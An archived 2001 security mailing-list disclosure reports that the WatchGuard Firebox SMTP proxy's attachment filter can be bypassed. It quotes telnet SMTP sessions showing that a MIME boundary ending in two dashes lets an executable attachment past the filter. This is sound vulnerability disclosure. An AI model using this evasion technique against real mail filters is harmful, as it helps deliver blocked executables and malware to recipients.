WatchGuard SMTP Proxy issue

From: Dante Mercurio (dmercurioat_private)
Date: Fri Jun 08 2001 - 13:26:33 PDT

Next message: ByteRage: "Broker FTP Server 5.9.5.0 Buffer Overflow / DoS / Directory Traversal"

Previous message: Caldera Support Information: "Security Update: [CSSA-2001-021.0] Volution 1.0 security update"
Next in thread: Steve Fallin: "RE: WatchGuard SMTP Proxy issue"
Reply: Steve Fallin: "RE: WatchGuard SMTP Proxy issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The WatchGuard firebox has an SMTP proxy that allows for the exclusion
of attachments by MIME type and by file extension. It has been found
that under certain conditions, this feature can be overridden, allowing
files such as executables and VB script through the filter.

A customer of mine originally reported a problem on 12/19/00 with
WatchGuard case #255345. This was on version 4.5 of their LiveSecurity
software. On 5/27/01 Thomas Boll sent the following to the WG support
forum:

> -----Original Message-----
> From: Thomas Boll [mailto:tbat_private]
> Sent: Sunday, May 27, 2001 7:13 PM
> To: 'wg-usersat_private'
> Cc: 'krolat_private'
> Subject: [WG-Users] SMTP Vulnerability!
> 
> 
> Hi List
> 
> Users have reported that attachments blocked by file extension
> make it through the SMTP Proxy even if the file extension is
> on the blocked list (WG 4.6).
> 
> After some testing I believe that the MIME boundary is responsible
> for the SMTP Proxy to fail. If the MIME boundary ends in two dashes
> the Proxy will not correctly identify the attachment. This seems to
> be typical for Free BSD based systems. This behaviour can be simply
> tested on any firewall using the SMTP Proxy denying some attachments
> based on the filename. Consider the two examples at the end 
> of this message.
> 
> The reason seems to be obvious, two dashes end the MIME 
> container, which
> leads to a misinterpretation of the SMTP proxy. 
> 
> Regards
> Thomas
> 
> ==============================================================
> =========
> 
> # telnet smtpserv 25
> Trying xxx.xxx.xxx.xxx...
> Connected to xxx.xxx.xx.
> Escape character is '^]'.
> 220 SMTP service ready
> helo mydomain.com
> 250 Requested mail action okay, completed
> mail from: meat_private
> 250 Requested mail action okay, completed
> rcpt to: meat_private
> 250 Requested mail action okay, completed
> data
> 354 Start mail input; end with <CRLF>.<CRLF>
> Content-Type: multipart/mixed; boundary="--sugus"
> 
> ----sugus
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> .
> 250 Requested mail action okay, completed
> 
> =====> THE ANSWER IS CORECT AS IN:
> ---------------------------------------------------------------
> From meat_private  Mon May 28 00:46:37 2001
> Return-Path: <meat_private>
> Delivered-To: meat_private
> Content-Type: multipart/mixed; boundary="--sugus"
> Date: Mon, 28 May 2001 00:45:54 +0200 (CEST)
> From: mwat_private
> 
> ----sugus
> Content-Type: text/plain; charset=us-ascii
> 
> [Attachment denied by WatchGuard SMTP proxy (type 
> "application/octet-stream", filename "Calc.exe")]
> 
> 
> ==============================================================
> ============
> If however the boundary ends in --, the check will fail:
> 
> 
> .....
> Content-Type: multipart/mixed; boundary="--sugus--"
> 
> ----sugus--
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> .
> 250 Requested mail action okay, completed
>   
> 
> THE RESULT IS WRONG NOW:
> 
> ----sugus--
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> ...
> 
> =================================================================
> =========
> For help or to subscribe/unsubscribe, send mail to:
> wg-users-requestat_private, with the word "subscribe", 
> "unsubscribe"
> or "help" in the body of the message.
> 

Versions 4.5 and 4.6 have been tested and confirmed vulnerable. It is
unknown if other versions are vulnerable also.

M. Dante Mercurio, CCNA, MCSE+I, CCSA
Consulting Services Manager
Continental Consulting Group, LLC
www.ccgsecurity.com <http://www.ccgsecurity.com> 
dmercurioat_private <mailto:dmercurioat_private>

Next message: ByteRage: "Broker FTP Server 5.9.5.0 Buffer Overflow / DoS / Directory Traversal"
Previous message: Caldera Support Information: "Security Update: [CSSA-2001-021.0] Volution 1.0 security update"
Next in thread: Steve Fallin: "RE: WatchGuard SMTP Proxy issue"
Reply: Steve Fallin: "RE: WatchGuard SMTP Proxy issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jun 08 2001 - 16:38:11 PDT